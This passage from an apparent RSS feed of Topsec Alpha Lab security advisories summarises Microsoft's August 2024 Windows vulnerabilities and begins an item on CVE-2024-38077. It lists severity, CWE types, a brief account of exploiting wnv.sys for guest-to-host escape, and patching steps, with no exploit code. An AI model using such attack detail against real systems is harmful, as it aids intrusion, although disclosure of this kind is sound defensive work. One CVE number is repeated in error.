Kernel中的对特殊元素的转义处理不恰当漏洞（CWE-138）。攻击者可以通过诱骗用户向恶意服务器发送请求来利用此漏洞。这可能导致服务器返回恶意数据，从而导致在用户系统上执行任意代码。成功利用此漏洞的攻击者可以获得SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38141：Windows WinSock辅助功能驱动本地权限提升漏洞</span></span></span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">该漏洞是Windows WinSock辅助功能驱动中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38147、CVE-2024-38150：Microsoft DWM核心库本地权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">这些漏洞都是Microsoft DWM核心库中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38148：Windows Secure Channel拒绝服务漏洞</span></span></span></span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Windows Secure Channel中的越界读漏洞（CWE-125）。未经身份认证的远程攻击者可以触发目标系统中的越界读取漏洞，并导致目标系统拒绝服务。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-38163：Windows Update Stack本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Windows Update Stack中的访问控制不当漏洞（CWE-284）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-38196：Windows通用日志文件系统驱动本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Windows通用日志文件系统驱动中的不正确的输入验证漏洞（CWE-20）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38198：Windows Print Spooler权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Print Spooler中的数据真实性验证不足漏洞（CWE-345）。经过普通用户身份认证的远程攻击者通过将特制的数据传递给目标系统来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。成功利用此漏洞需要攻击者赢得竞争条件。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38140</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows可靠的组播传输驱动(RMCAST)远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38159</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Network Virtualization远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.1/7.9</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38160</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Network Virtualization远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.1/7.9</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38140：Windows可靠的组播传输驱动(RMCAST)远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Windows可靠的组播传输驱动(RMCAST)中的释放后重用UAF漏洞（CWE-416）。未经身份认证的远程攻击者可以通过向服务器上的Windows Pragmatic General Multicast(PGM)开放套接字发送特制的数据包来利用此漏洞，而无需用户进行任何交互。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38159、CVE-2024-38160：Windows Network Virtualization远程代码执行漏洞</span></span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">CVE-2024-38159是Windows Network Virtualization中的释放后重用UAF漏洞（CWE-416）。CVE-2024-38159是Windows Network Virtualization中的堆溢出漏洞（CWE-122）。为了成功利用这些漏洞，攻击者或目标用户需要对机器实现高级别的控制，因为攻击需要访问通常限制普通用户访问的进程。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">攻击者可以利用Windows Server 2016的wnv.sys组件中未经检查的返回值来利用此漏洞。通过操纵内存描述符表(MDL)的内容，攻击者可以导致未经授权的内存写入，甚至释放当前正在使用的有效块，从而导致关键的客户机到主机的逃逸。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的8月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Aug" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Aug</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496656">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=55866f51&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496656%26idx%3D1%26sn%3D629d69cf53bcf827e6076a1ce898aa41%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 14 Aug 2024 15:31:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于Windows 远程桌面许可服务远程代码执行漏洞(CVE-2024-38077)的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496654&amp;idx=1&amp;sn=c5c34d08fc0854fbc917b591cdaf263c</link>
      <description>8月9日，天融信阿尔法实验室监测到被命名为“狂躁许可（MadLicense）”的远程桌面许可服务远程代码执行漏洞（CVE-2024-38077）的部分漏洞细节及PoC伪代码在互联网上公开，微软已在2024年7月月度更新中发布此漏洞的补丁。</description>
      <content:encoded><![CDATA[<p>
<span>天融信应急响应</span> <span>2024-08-09 13:29</span> <span style="display: inline-block;">北京</span>
</p>

<p>8月9日，天融信阿尔法实验室监测到被命名为“狂躁许可（MadLicense）”的远程桌面许可服务远程代码执行漏洞（CVE-2024-38077）的部分漏洞细节及PoC伪代码在互联网上公开，微软已在2024年7月月度更新中发布此漏洞的补丁。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=e6d190db&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dEXu2UY6wwxsAEU4J9fTOHKwuHxg1iamtp8PBg6Fy20hQph47j6tfXqFGibzRF4blMAUc8nvhibq63Ug%2F0%3Fwx_fmt%3Djpeg"/>
</p>


